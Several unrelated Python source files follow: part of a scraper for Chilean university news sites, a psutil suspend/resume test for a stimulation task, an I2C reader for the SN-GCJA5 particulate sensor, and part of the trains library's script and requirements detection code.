    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UNAP')
    url_base = 'https://www.unap.cl'
    # Category slug -> listing page URL.
    urls_news = {
        'investigacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_13_48__1.html',
        'vinculacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_38_39__1.html',
        'acreditacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_83_113__1.html',
        'casa-central': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_15__1.html',
        'sede-victoria': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_17__1.html',
        'noticias-arica': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_12__1.html',
        'noticias-antofagasta': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_14__1.html',
        'noticias-santiago': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_16__1.html'
    }
    for cat, url in urls_news.items():
        contents = urllib.request.urlopen(url).read()
        bs = BeautifulSoup(contents, "html.parser")
        items = bs.find_all("div", {"class": "taxport-item"})
        items = list(set(items)) # Remove duplicate entries
        for item in items:
            try:
                link = url_base + item.find("div", {"class": "titular"}).a['href'].strip()
                titulo = item.find("div", {"class": "titular"}).a.text.strip()
                fecha = item.find("div", {"class": "fecha"}).text.strip()
                fecha = formatear_fecha(fecha, 'unap')
                noticia = urllib.request.urlopen(link).read()
                bs_noticia = BeautifulSoup(noticia, "html.parser")
                try:
                    bajada = bs_noticia.find(id='content').find('h2', {'class': 'bajada'}).text.strip()
                except Exception:
                    # No dedicated lede — use the first non-empty body paragraph.
                    bajada = bs_noticia.find("div", {"class": "CUERPO"}).find_all('p')
                    for b in bajada:
                        b = b.text.strip()
                        if b: # If the paragraph is non-empty, keep it and stop searching
                            bajada = b
                            break
                try:
                    imagen = url_base + bs_noticia.find("div", {"class": "CUERPO"}).find("img")['src'].strip()
                except Exception:
                    imagen = ''
                categoria_busqueda = setCategoria(cat)
                saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
            except Exception as e:
                # NOTE(review): names above may be unbound here on early failure.
                result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Antofagasta
def ua():
    """Scrape Universidad de Antofagasta news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UA')
    url_rss = "http://www.comunicacionesua.cl/feed/"
    feed = feedparser.parse( url_rss )
    for item in feed['items']:
        try:
            titulo = item['title']
            bajada = item['description']
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "ua")
            categoria_busqueda = setCategoria(item['category'])
            # Featured image comes from the article page, not the feed.
            noticia = urllib.request.urlopen(link).read()
            imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'qode-post-image'}).img['src']
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de Atacama
def uda():
    """Scrape Universidad de Atacama news from its Atom feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UDA')
    url_rss = "http://www.uda.cl/index.php?option=com_content&view=category&layout=blog&id=15&Itemid=253&format=feed&type=atom"
    feed = feedparser.parse( url_rss )
    for item in feed['items']:
        try:
            titulo = item['title']
            # The lede is the first paragraph of the HTML summary.
            bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "uda")
            categoria_busqueda = setCategoria(item['category'])
            # Image src in the summary is site-relative.
            imagen = "http://www.uda.cl/" + BeautifulSoup(item['summary'], "html.parser").find('img')['src']
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de La Serena
# Región de Coquimbo
def userena():
    """Scrape Universidad de La Serena news from its three RSS feeds."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='USERENA')
    url_rss = ['http://www.userena.cl/actualidad-uls.feed?type=rss',
            'http://www.userena.cl/cultura-y-extension.feed?type=rss',
            'http://www.userena.cl/dgae.feed?type=rss']
    feeds = []
    for url in url_rss:
        feeds.append(feedparser.parse( url ))
    for feed in feeds:
        for item in feed['items']:
            try:
                titulo = item['title']
                # Third paragraph of the HTML summary carries the lede.
                bajada = BeautifulSoup(item['summary'], "html.parser").find_all('p')[2].text
                link = item['link']
                fecha = item['published']
                fecha = formatear_fecha(fecha, "userena")
                categoria_busqueda = setCategoria(item['category'])
                imagen = BeautifulSoup(item['summary'], "html.parser").p.img['src']
                saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
            except Exception as e:
                # NOTE(review): names above may be unbound here on early failure.
                result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de O'Higgins
def uoh():
    """Placeholder scraper for Universidad de O'Higgins — not implemented yet."""
    # https://www.uoh.cl/
    # https://www.uoh.cl/#noticias-y-eventos
    logging.debug('Lanzado')
    # universidad = Universidad.objects.get(alias='UOH')
    # contents = urllib.request.urlopen("https://www.uoh.cl/#noticias-y-eventos").read()
    logging.debug('Deteniendo')
# Universidad Católica del Maule
def ucm():
    """Scrape Universidad Católica del Maule news from its RSS feed."""
    # http://portal.ucm.cl/
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UCM')
    url_rss = "https://portal.ucm.cl/feed" # RSS feed URL
    feed = feedparser.parse( url_rss ) # Fetch and parse the XML
    for item in feed['items']:
        try:
            titulo = item['title']
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "ucm")
            categoria_busqueda = setCategoria(item['category'])
            # Image and lede come from the article page, not the feed.
            noticia = urllib.request.urlopen(link).read()
            imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-image'}).img['src']
            bajada = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-paragraph'}).find_all('p')[1].text
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# Universidad de la Frontera
def ufro():
    """Scrape Universidad de la Frontera featured news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UFRO')
    url_rss = 'https://www.ufro.cl/index.php/noticias/12-destacadas?format=feed&type=rss'
    feed = feedparser.parse( url_rss )
    for item in feed['items']:
        try:
            titulo = item['title']
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "ufro")
            categoria_busqueda = setCategoria(item['category'])
            noticia = urllib.request.urlopen(link).read()
            imagen = 'https://www.ufro.cl' + BeautifulSoup(noticia, "html.parser").find('td', {'id': 'imagen'}).p.img['src']
            bajada = BeautifulSoup(noticia, "html.parser").find('p', {'class': 'bajada'}).text.strip()
            # Fall back to the first table-cell paragraph when the lede is empty.
            if not bajada:
                bajada = BeautifulSoup(noticia, "html.parser").find('table', {'class': 'tnoticia'}).tbody.tr.find_all('td')[1].p.text.strip()
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# https://www.ufro.cl/
# Universidad Católica de Temuco
def uct():
    """Placeholder scraper for Universidad Católica de Temuco — not implemented.

    The site renders its news list with Angular, so static HTML fetching
    does not work; a browser-automation tool such as selenium is required.
    """
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UCT')
    url_base = 'https://www.uct.cl/actualidad/?typing=noticias'
    # contents = urllib.request.urlopen(url_base).read()
    # bs = BeautifulSoup(contents, "html.parser")
    # items = bs.find_all("div", {"class": "cardwdetail"})
    # print('------------------')
    # print( items )
    # print('------------------')
    logging.debug('Deteniendo')
    # https://www.uct.cl/
    pass
# Universidad Austral de Chile
def uach():
    """Placeholder scraper for Universidad Austral de Chile — not implemented yet."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UACH')
    url = ''
    logging.debug('Deteniendo')
    # https://www.uach.cl/
    pass
# Universidad de Aysén
def uaysen():
    """Placeholder scraper for Universidad de Aysén — not implemented yet."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UAYSEN')
    url = ''
    logging.debug('Deteniendo')
    # https://uaysen.cl/
    pass
# Universidad de Magallanes
def umag():
    """Scrape Universidad de Magallanes news from its communications page."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UMAG')
    url = 'http://www.umag.cl/vcm/?page_id=459'
    contents = urllib.request.urlopen(url).read()
    bs = BeautifulSoup(contents, "html.parser")
    items = bs.find_all("div", {"class": "not-col11"})
    for item in items:
        try:
            link = item.find('a', {'class': 'link'})['href']
            noticia = urllib.request.urlopen(link).read()
            bs_noticia = BeautifulSoup(noticia, "html.parser")
            titulo = bs_noticia.find('div', {'class': 'post-title'}).h2.a.text.strip()
            fecha = bs_noticia.find('span', {'class': 'post-dates'}).text.strip()
            fecha = formatear_fecha(fecha, "umag")
            # This site exposes no usable category.
            categoria_busqueda = setCategoria('')
            try:
                imagen = bs_noticia.find('div', {'class': 'entry'}).find('a').find('img')['src']
            except:
                imagen = ''
            bajada = bs_noticia.find('div', {'class': 'entry'}).p.text.strip()
            # Fall back to the third paragraph when the first is empty.
            if not bajada:
                bajada = bs_noticia.find('div', {'class': 'entry'}).find_all('p')[2].text.strip()
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# http://www.umag.cl/
# Universidad de Tarapacá
def uta():
    """Scrape Universidad de Tarapacá news from its RSS feed."""
    logging.debug('Lanzado')
    universidad = Universidad.objects.get(alias='UTA')
    url_rss = 'https://www.uta.cl/index.php/feed/'
    feed = feedparser.parse( url_rss )
    for item in feed['items']:
        try:
            titulo = item['title']
            link = item['link']
            fecha = item['published']
            fecha = formatear_fecha(fecha, "uta")
            # Category is optional in this feed.
            try:
                categoria_busqueda = setCategoria(item['category'])
            except:
                categoria_busqueda = setCategoria()
            bajada = item['summary'].strip()
            noticia = urllib.request.urlopen(link).read()
            # The image markup varies between WP block layouts; try both.
            try:
                imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'wp-block-image'}).figure.a.img['src']
            except:
                try:
                    imagen = BeautifulSoup(noticia, "html.parser").find('figure', {'class': 'wp-block-image'}).a.img['src']
                except:
                    imagen = ''
            saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
        except Exception as e:
            # NOTE(review): names above may be unbound here on early failure.
            result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
    logging.debug('Deteniendo')
# https://www.uta.cl/
|
multiprocessing.py | """Test for suspending and resuming a process."""
import multiprocessing as mp
import time
import psutil
from bsl.triggers import ParallelPortTrigger
from cardio_audio_sleep.config import load_triggers
from cardio_audio_sleep.tasks import isochronous
from cardio_audio_sleep.utils import generate_sequence, search_ANT_amplifier
# Manual test: run the isochronous stimulation task in a child process,
# freeze it for 2 s with psutil, resume it, and let it finish.
if __name__ == "__main__":
    trigger = ParallelPortTrigger("/dev/parport0")  # hardware trigger port
    tdef = load_triggers()  # trigger definition table
    stream_name = search_ANT_amplifier()  # NOTE(review): unused below — verify
    ecg_ch_name = "AUX7"  # NOTE(review): unused below — verify
    # NOTE(review): args presumably (n_stimuli, n_omissions, edge) — confirm.
    sequence = generate_sequence(20, 0, 10, tdef)
    delay = 0.5  # inter-stimulus interval (seconds)
    process = mp.Process(
        target=isochronous, args=(trigger, tdef, sequence, delay)
    )
    process.start()
    psutil_process = psutil.Process(process.pid)
    time.sleep(5)  # let the task run for a while
    psutil_process.suspend()  # pause the child process
    time.sleep(2)
    psutil_process.resume()  # resume it
    process.join()
|
sngcja5_thread.py | import sys
import logging
import threading
import smbus
from time import sleep
from queue import Queue
from datetime import datetime
# Register-map constants for the Panasonic SN-GCJA5 particulate sensor.
MASS_DENSITY_PM_TYPES = ["pm1.0", "pm2.5", "pm10"]
MASS_DENSITY_BLOCK_SIZE = 4
ADDRESS_MASS_DENSITY_HEAD = 0
ADDRESS_MASS_DENSITY_TAIL = 11
ADDRESS_MASS_DENSITY_LENGTH = (ADDRESS_MASS_DENSITY_TAIL - ADDRESS_MASS_DENSITY_HEAD) + 1
'''
Address register of mass density values is started from 0 (0x00) to 11 (0x0B).
Size of each value block is 4 bytes (32 bits)
Total data length is 12 bytes
Value allocation
------------------------
PM1.0: byte 0 - byte 3
PM2.5: byte 4 - byte 7
PM10: byte 8 - byte 11
'''
PARTICLE_COUNT_PM_TYPES = ["pm0.5", "pm1.0", "pm2.5", "N/A", "pm5.0", "pm7.5", "pm10"]
PARTICLE_COUNT_BLOCK_SIZE = 2
ADDRESS_PARTICLE_COUNT_HEAD = 12
ADDRESS_PARTICLE_COUNT_TAIL = 25
ADDRESS_PARTICLE_COUNT_LENGTH = (ADDRESS_PARTICLE_COUNT_TAIL - ADDRESS_PARTICLE_COUNT_HEAD) + 1
'''
Address register of particle count values is started from 12 (0x0C) to 25 (0x19)
Size of each value block is 2 bytes (16 bits)
Total data length is 14 bytes (or 12 bytes excluding byte 18 and 19)
Value allocation
------------------------
PM0.5: byte 12 - byte 13
PM1.0: byte 14 - byte 15
PM2.5: byte 16 - byte 17
N/A: byte 18 - byte 19
PM5.0: byte 20 - byte 21
PM7.5: byte 22 - byte 23
PM10: byte 24 - byte 25
'''
STATUS_MASTER = "Sensor status"
# Each status field is 2 bits wide in the status byte.
STATUS_BIT_MASK = 0b11
# BUGFIX: this dict literal previously ended with ']' instead of '}',
# which is a SyntaxError.  Maps status-field name -> bit offset.
STATUS_BYTE_FIELDS = {"Sensor status": 6, "PD Status": 4, "LD Status": 2, "Fan status": 0}
ADDRESS_STATUS_BYTE = 0x26
# Total raw data length stored in sensor register, i.e. 26 bytes
DATA_LENGTH_HEAD = ADDRESS_MASS_DENSITY_HEAD
DATA_LENGTH_TAIL = ADDRESS_PARTICLE_COUNT_TAIL
TOTAL_DATA_LENGTH = ADDRESS_MASS_DENSITY_LENGTH + ADDRESS_PARTICLE_COUNT_LENGTH
class SNGCJA5_thread:
    """Background reader for the Panasonic SN-GCJA5 particulate sensor.

    Spawns a daemon thread that polls the sensor over I2C roughly once per
    second and pushes decoded readings into a bounded queue; consumers pull
    them with get_measurement().
    """
    def __init__(self, i2c_bus_no:int, logger:str=None):
        self.logger = None
        if logger:
            self.logger = logging.getLogger(logger)
        self.i2c_address = 0x33  # I2C address of the SN-GCJA5
        try:
            self.i2c_bus = smbus.SMBus(i2c_bus_no)
        except OSError as e:
            print("OSError")
            print(e)
        # Byte offset of each PM value inside its register block.
        self.__mass_density_addresses = {pm_type: MASS_DENSITY_BLOCK_SIZE*order
                                         for order, pm_type in enumerate(MASS_DENSITY_PM_TYPES)}
        self.__particle_count_addresses = {pm_type: PARTICLE_COUNT_BLOCK_SIZE*order
                                           for order, pm_type in enumerate(PARTICLE_COUNT_PM_TYPES)}
        self.__current_status = {STATUS_MASTER: 0}
        # Bounded buffer: the oldest reading is dropped when it fills up.
        self.__data = Queue(maxsize=20)
        self.__run()

    def get_mass_density_data(self, data:list) -> dict:
        """Decode 32-bit little-endian mass-density blocks (raw / 1000)."""
        return {pm_type:
                    float((data[address+3] << 24 |
                           data[address+2] << 16 |
                           data[address+1] << 8 |
                           data[address]) / 1000)
                for pm_type, address in self.__mass_density_addresses.items()}

    def get_particle_count_data(self, data:list) -> dict:
        """Decode 16-bit little-endian particle counts, skipping the reserved slot."""
        return {pm_type:
                    float((data[address+1] << 8 | data[address]))
                for pm_type, address in self.__particle_count_addresses.items()
                if pm_type != "N/A"}

    def __read_sensor_data(self) -> None:
        """Poll loop run on the daemon thread: check status, read, decode, enqueue."""
        while True:
            try:
                status = self.i2c_bus.read_i2c_block_data(self.i2c_address,ADDRESS_STATUS_BYTE,1)
                self.__current_status = {stat_name:(status[0] & (STATUS_BIT_MASK << STATUS_BYTE_FIELDS[stat_name])) >> STATUS_BYTE_FIELDS[stat_name] for stat_name in STATUS_BYTE_FIELDS}
                if (self.__current_status[STATUS_MASTER] == 0):
                    data = self.i2c_bus.read_i2c_block_data(self.i2c_address, DATA_LENGTH_HEAD, TOTAL_DATA_LENGTH)
                else:
                    if self.logger:
                        self.logger.warning(f"Sensor status not OK - status values {self.__current_status}")
                    # BUGFIX: previously execution fell through and decoded
                    # 'data' even though nothing was read this iteration —
                    # NameError on the first failure, and afterwards a stale
                    # reading was re-queued with a fresh timestamp.  Skip the
                    # iteration instead (the finally-sleep still runs).
                    continue
                mass_density_data = self.get_mass_density_data(data[ADDRESS_MASS_DENSITY_HEAD:ADDRESS_MASS_DENSITY_TAIL+1])
                particle_count_data = self.get_particle_count_data(data[ADDRESS_PARTICLE_COUNT_HEAD:ADDRESS_PARTICLE_COUNT_TAIL+1])
                if self.__data.full():
                    self.__data.get()  # drop the oldest reading to make room
                self.__data.put({
                    "sensor_data": {
                        "mass_density": mass_density_data,
                        "particle_count": particle_count_data,
                        "mass_density_unit": "ug/m3",
                        "particle_count_unit": "none"
                    },
                    "timestamp": int(datetime.now().timestamp())
                })
            except KeyboardInterrupt:
                sys.exit()
            except OSError as e:
                if self.logger:
                    self.logger.warning(f"{type(e).__name__}: {e}")
                    self.logger.warning("Sensor is not detected on I2C bus. Terminating...")
                else:
                    print(f"{type(e).__name__}: {e}")
                    print("Sensor is not detected on I2C bus. Terminating...")
                sys.exit(1)
            except Exception as e:
                if self.logger:
                    self.logger.warning(f"{type(e).__name__}: {e}")
                else:
                    print(f"{type(e).__name__}: {e}")
            finally:
                # Data is updated by sensor every 1 second as per specification.
                # 1-second delay is added to compensate data duplication
                sleep(1)

    def get_measurement(self) -> dict:
        """Return the oldest queued reading, or {} when none is available."""
        if self.__data.empty():
            return {}
        return self.__data.get()

    def __run(self):
        # Daemon thread so the reader dies with the main program.
        threading.Thread(target=self.__read_sensor_data, daemon=True).start()
|
scriptinfo.py | import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
    """Raised when script/repository information cannot be gathered."""
class ScriptRequirements(object):
    def __init__(self, root_folder):
        """Store the project root that will later be scanned for imported packages."""
        self._root_folder = root_folder
    def get_requirements(self, entry_point_filename=None):
        """Scan the project folder and build its pip/conda requirements.

        Uses the bundled pigar fork to detect imported packages, then renders
        them via create_requirements_txt().  Returns a (pip, conda) pair of
        requirement strings; on any failure returns ('', '') rather than raise.
        """
        try:
            from ....utilities.pigar.reqs import get_installed_pkgs_detail
            from ....utilities.pigar.__main__ import GenerateReqs
            installed_pkgs = get_installed_pkgs_detail()
            gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
                              ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
                                       'site-packages', 'dist-packages'])
            reqs, try_imports, guess, local_pks = gr.extract_reqs(
                module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
            return self.create_requirements_txt(reqs, local_pks)
        except Exception:
            # Best-effort: requirement detection must never break task creation.
            return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
    """Background watcher that periodically snapshots a Jupyter notebook
    (script code + requirements) into the currently running Task."""

    _thread = None
    _exit_event = Event()
    _sync_event = Event()
    _sample_frequency = 30.
    _first_sample_frequency = 3.

    @classmethod
    def observer(cls, jupyter_notebook_filename):
        """(Re)start the observer daemon thread for the given notebook file."""
        if cls._thread is not None:
            # order of signaling is important!
            cls._exit_event.set()
            cls._sync_event.set()
            cls._thread.join()
            cls._sync_event.clear()
            cls._exit_event.clear()
        cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
        cls._thread.daemon = True
        cls._thread.start()

    @classmethod
    def signal_sync(cls, *_):
        """Request an immediate snapshot from the daemon loop."""
        cls._sync_event.set()

    @classmethod
    def close(cls):
        """Stop and join the observer thread; no-op when it never started."""
        if not cls._thread:
            return
        cls._exit_event.set()
        cls._sync_event.set()
        cls._thread.join()
        cls._thread = None

    @classmethod
    def _daemon(cls, jupyter_notebook_filename):
        """Observer loop: export the notebook to a script and push it to the Task."""
        from trains import Task

        # load jupyter notebook package
        # noinspection PyBroadException
        try:
            from nbconvert.exporters.script import ScriptExporter
            _script_exporter = ScriptExporter()
        except Exception:
            return

        # load pigar
        # noinspection PyBroadException
        try:
            from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
            from ....utilities.pigar.modules import ReqsModules
            from ....utilities.pigar.log import logger
            logger.setLevel(logging.WARNING)
        except Exception:
            file_import_modules = None

        # load IPython
        # noinspection PyBroadException
        try:
            from IPython import get_ipython
        except Exception:
            # should not happen
            get_ipython = None

        # setup local notebook files
        if jupyter_notebook_filename:
            notebook = Path(jupyter_notebook_filename)
            local_jupyter_filename = jupyter_notebook_filename
        else:
            notebook = None
            fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
            os.close(fd)

        last_update_ts = None
        counter = 0
        prev_script_hash = None

        # noinspection PyBroadException
        try:
            from ....version import __version__
            our_module = cls.__module__.split('.')[0], __version__
        except Exception:  # was a bare except
            our_module = None

        # noinspection PyBroadException
        try:
            import re
            # raw strings: '\(' / '\g' are invalid escapes in plain strings
            replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
        except Exception:  # was a bare except
            replace_ipython_pattern = None

        # main observer loop, check if we need to exit
        while not cls._exit_event.wait(timeout=0.):
            # wait for timeout or sync event
            cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
            cls._sync_event.clear()
            counter += 1
            # noinspection PyBroadException
            try:
                # if there is no task connected, do nothing
                task = Task.current_task()
                if not task:
                    continue
                # if we have a local file:
                if notebook:
                    if not notebook.exists():
                        continue
                    # check if notebook changed
                    if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
                        continue
                    last_update_ts = notebook.stat().st_mtime
                else:
                    # serialize notebook to a temp file
                    # noinspection PyBroadException
                    try:
                        get_ipython().run_line_magic('notebook', local_jupyter_filename)
                    except Exception:
                        continue
                # get notebook python script
                script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
                # hash() is fine here: comparison is only ever intra-process
                current_script_hash = hash(script_code)
                if prev_script_hash and prev_script_hash == current_script_hash:
                    continue
                # remove ipython direct access from the script code
                # we will not be able to run them anyhow
                if replace_ipython_pattern:
                    script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)

                requirements_txt = ''
                conda_requirements = ''
                # parse jupyter python script and prepare pip requirements (pigar)
                # if backend supports requirements
                if file_import_modules and Session.check_min_api_version('2.2'):
                    fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
                    fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
                    installed_pkgs = get_installed_pkgs_detail()
                    # make sure we are in installed packages
                    if our_module and (our_module[0] not in installed_pkgs):
                        installed_pkgs[our_module[0]] = our_module
                    reqs = ReqsModules()
                    for name in fmodules:
                        if name in installed_pkgs:
                            pkg_name, version = installed_pkgs[name]
                            reqs.add(pkg_name, version, fmodules[name])
                    requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)

                # update script
                prev_script_hash = current_script_hash
                data_script = task.data.script
                data_script.diff = script_code
                data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
                task._update_script(script=data_script)
                # update requirements
                task._update_requirements(requirements=requirements_txt)
            except Exception:
                pass
class ScriptInfo(object):
    """Detect the running script's repository, entry point, diff and requirements."""

    plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
    """ Script info detection plugins, in order of priority """

    @classmethod
    def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
        """Start the notebook observer and re-sync it on every cell execution."""
        # noinspection PyBroadException
        try:
            if 'IPython' in sys.modules:
                from IPython import get_ipython
                if get_ipython():
                    _JupyterObserver.observer(jupyter_notebook_filename)
                    get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
        except Exception:
            pass

    @classmethod
    def _get_jupyter_notebook_filename(cls):
        """Return the notebook's .py entry point when running under Jupyter, else None."""
        if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
                sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
